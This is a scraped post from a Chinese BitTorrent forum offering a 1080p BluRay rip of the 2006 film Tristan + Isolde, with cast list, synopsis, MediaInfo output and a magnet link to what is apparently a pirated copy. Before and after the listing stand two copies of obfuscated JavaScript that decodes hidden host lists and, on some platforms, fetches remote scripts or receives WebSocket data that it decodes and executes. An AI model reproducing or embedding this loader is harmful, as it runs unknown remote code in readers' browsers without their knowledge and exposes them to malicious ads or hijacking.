王者之心[国英多音轨/简繁字幕].Tristan.and.Isolde.2006.BluRay.1080p.2Audio.DTS-HD.MA5.1.x265.10bit 12.56GB

版主小s 18天前 172

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 王者之心 / 崔斯坦和依索德 / 崔斯坦与伊索德 / 特里斯坦和伊索尔德

◎片 名 Tristan + Isolde

◎年 代 2006

◎产 地 美国 / 英国 / 德国

◎类 别 剧情 / 动作 / 爱情 / 冒险 / 古装

◎语 言 英语

◎上映日期 2007-05-25(中国大陆) / 2006-01-13(美国)

◎IMDb链接 https://www.imdb.com/title/tt0375154/

◎豆瓣评分 7.1/10 (14625人评价)

◎豆瓣链接 https://movie.douban.com/subject/1461919/

◎片 长 125分钟

◎导 演 凯文·雷诺兹 Kevin Reynolds (id:1014056)

◎编 剧 迪恩·乔格瑞斯 Dean Georgaris (id:1326742)

◎演 员 詹姆斯·弗兰科 James Franco (id:1019001)

索菲娅·迈尔斯 Sophia Myles (id:1031869)

卢夫斯·塞维尔 Rufus Sewell (id:1041126)

大卫·奥哈拉 David O'Hara (id:1131482)

马克·斯特朗 Mark Strong (id:1274374)

亨利·卡维尔 Henry Cavill (id:1044713)

布罗娜·加拉赫 Bronagh Gallagher (id:1284418)

罗南·维博特 Ronan Vibert (id:1149774)

露西·拉塞尔 Lucy Russell (id:1275142)

JB·布兰科 JB Blanc (id:1186083)

里奥·格雷高里 Leo Gregory (id:1040756)

德克斯特·弗莱彻 Dexter Fletcher (id:1007028)

理查德·迪兰 Richard Dillane (id:1335290)

汉斯·马丁·施蒂尔 Hans Martin Stier (id:1151061)

托马斯·莫里斯 Thomas Morris (id:1056189)

杰米·托马斯·金 Jamie Thomas King (id:1215599)

沃尔夫冈·穆勒 Wolfgang Müller (id:1136873)

Cheyenne Rushing Cheyenne Rushing (id:1141669)

芭芭拉·科德托娃 Barbora Kodetová (id:1105977)

托马斯·布罗迪-桑斯特 Thomas Brodie-Sangster (id:1016669)

Jack Montgomery (id:1251509)

马雷克·瓦苏特 Marek Vasut (id:1160681)

Todd Kramer Todd Kramer (id:1104523)

雯特·艾娃·佐莉 Winter Ave Zoli (id:1335423)

米罗斯拉夫·西蒙尼克 Miroslav Simunek (id:1154619)

莱乔·瓦斯列夫 Raicho Vasilev (id:1154553)

詹姆斯·弗林 James Flynn (id:1283891)

詹妮娜·法西奥 Giannina Facio (id:1050008)

Lisa Ellzey Lisa Ellzey (id:1283151)

埃利·萨马哈 Elie Samaha (id:1045326)

雷德利·斯科特 Ridley Scott (id:1054416)

弗兰克·休伯纳 Frank Hübner (id:1287084)

吉姆·莱姆利 Jim Lemley (id:1032590)

托尼·斯科特 Tony Scott (id:1017979)

Jan Fantl Jan Fantl (id:1019453)

马修·斯蒂尔曼 Matthew Stillman (id:1029083)

安妮·达德莉 Anne Dudley (id:1048431)

Artur Reinhart Artur Reinhart (id:1001766)

彼得·波义耳 Peter Boyle (id:1070291)

马克·杰拉蒂 Mark Geraghty (id:1284723)

毛里齐奥·米莱诺蒂 Maurizio Millenotti (id:1021943)

曼奥·罗切蒂 Manlio Rocchetti (id:1295835)

Mario Michisanti Mario Michisanti (id:1291991)

琳达·梅拉佐 Linda Melazzo (id:1291788)

Jirí Farkas Jirí Farkas (id:1090560)

Stefano Ceccarelli Stefano Ceccarelli (id:1280336)

Jaroslav Samal Jaroslav Samal (id:1296557)

Massimiliano Duranti Massimiliano Duranti (id:1303363)

Mirella Ginnoto Mirella Ginnoto (id:1284896)

Mark Taylor Mark Taylor (id:1159673)

欧德里奇·马赫 Oldrich Mach (id:1024866)

Tara McNamee Tara McNamee (id:1193999)

尼克·鲍威尔 Nick Powell (id:1294826)

Mark Carter Mark Carter (id:1280189)

Vít Komrzy Vít Komrzy (id:1288857)

Florian Martin Florian Martin (id:1118690)

◎标 签 爱情 / 史诗 / 美国 / 战争 / 历史 / 美国电影 / JamesFranco / 古装

◎简 介

中世纪,罗马帝国毁灭,各方势力分割盘踞英格兰,爱尔兰国王乘机聚集势力、虎视眈眈。雄图大略的马克王(卢夫斯·塞维尔 Rufus Sewell 饰)希望在传奇骑士特里斯坦(詹姆斯·弗兰科 James Franco 饰)的帮助下实现统一大业。失去双亲特里斯坦的他被马克王悉心抚养长大,情同父子。为分裂英格兰各部落,爱尔兰王决定以女儿为奖品举办全英骑士大赛。特里斯坦为马克王赢得了公主,但当看到公主的真面目时他如遭雷击。原来他曾在进攻爱尔兰的战斗中身负重伤,得到了神秘爱尔兰女子伊索尔德(索非亚·迈尔斯 Sophia Myles 饰)的照顾。两人由此相爱,但为了统一大业不得不分离。不管是为了国家和平还是为了养育之情,特里斯坦和伊索尔德都无法再继续恋情。

他们将如何压抑这份热情?而爱尔兰国王的阴谋是否给马克王的统一大业带去障碍?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 287658906318470250888003240427722601712 (0xD8691713BB7E39A379B9CF27307374F0)

  4. Complete name : Tristan.an[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.6 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.3 Mb/s

  11. Encoded date : UTC 2021-11-14 03:12:55

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 5 min

  21. Bit rate : 12.1 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.252

  31. Stream size : 10.6 GiB (84%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 12074 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / total-frames=180442 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 2 h 5 min

  49. Bit rate mode : Variable

  50. Bit rate : 1 943 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 1.70 GiB (14%)

  58. Title : English DTS-HD Master Audio 5.1 @ 1943 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 2 h 5 min

  69. Bit rate mode : Constant

  70. Bit rate : 192 kb/s

  71. Channel(s) : 2 channels

  72. Channel layout : L R

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 172 MiB (1%)

  77. Title : Mandarin Dolby Digital Audio 2.0 @ 192 kbps 央视国配

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Text #1

  83. ID : 4

  84. Format : PGS

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 2 h 4 min

  88. Bit rate : 22.2 kb/s

  89. Count of elements : 2248

  90. Stream size : 19.7 MiB (0%)

  91. Title : Eng/SUP

  92. Language : English

  93. Default : No

  94. Forced : No


  95. Text #2

  96. ID : 5

  97. Format : PGS

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 57 min

  101. Bit rate : 18.8 kb/s

  102. Count of elements : 1922

  103. Stream size : 15.8 MiB (0%)

  104. Title : Chs/SUP 简体

  105. Language : Chinese

  106. Default : Yes

  107. Forced : No


  108. Text #3

  109. ID : 6

  110. Format : PGS

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 57 min

  114. Bit rate : 19.2 kb/s

  115. Count of elements : 1922

  116. Stream size : 16.1 MiB (0%)

  117. Title : Cht/SUP 繁体

  118. Language : Chinese

  119. Default : No

  120. Forced : No


  121. Text #4

  122. ID : 7

  123. Format : PGS

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 57 min

  127. Bit rate : 34.3 kb/s

  128. Count of elements : 1922

  129. Stream size : 28.8 MiB (0%)

  130. Title : Chs/SUP 简英双语

  131. Language : Chinese

  132. Default : No

  133. Forced : No


  134. Text #5

  135. ID : 8

  136. Format : PGS

  137. Codec ID : S_HDMV/PGS

  138. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  139. Duration : 1 h 57 min

  140. Bit rate : 34.6 kb/s

  141. Count of elements : 1922

  142. Stream size : 29.1 MiB (0%)

  143. Title : Cht/SUP 繁英双语

  144. Language : Chinese

  145. Default : No

  146. Forced : No


  147. Menu

  148. 00:00:00.000 : en:第 01 章

  149. 00:08:10.824 : en:第 02 章

  150. 00:14:29.494 : en:第 03 章

  151. 00:20:47.037 : en:第 04 章

  152. 00:28:47.476 : en:第 05 章

  153. 00:38:09.287 : en:第 06 章

  154. 00:47:24.508 : en:第 07 章

  155. 00:55:15.479 : en:第 08 章

  156. 01:02:43.802 : en:第 09 章

  157. 01:13:43.669 : en:第 10 章

  158. 01:24:30.691 : en:第 11 章

  159. 01:31:08.254 : en:第 12 章

  160. 01:41:24.245 : en:第 13 章

  161. 01:51:04.616 : en:第 14 章

  162. 01:58:08.540 : en:第 15 章




复制代码


TAGS 动作 冒险 剧情 古装 爱情

磁力链:
  • magnet:?xt=urn:btih:62165701D2B57B321A7F3C100149DBFA39FB90FE

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};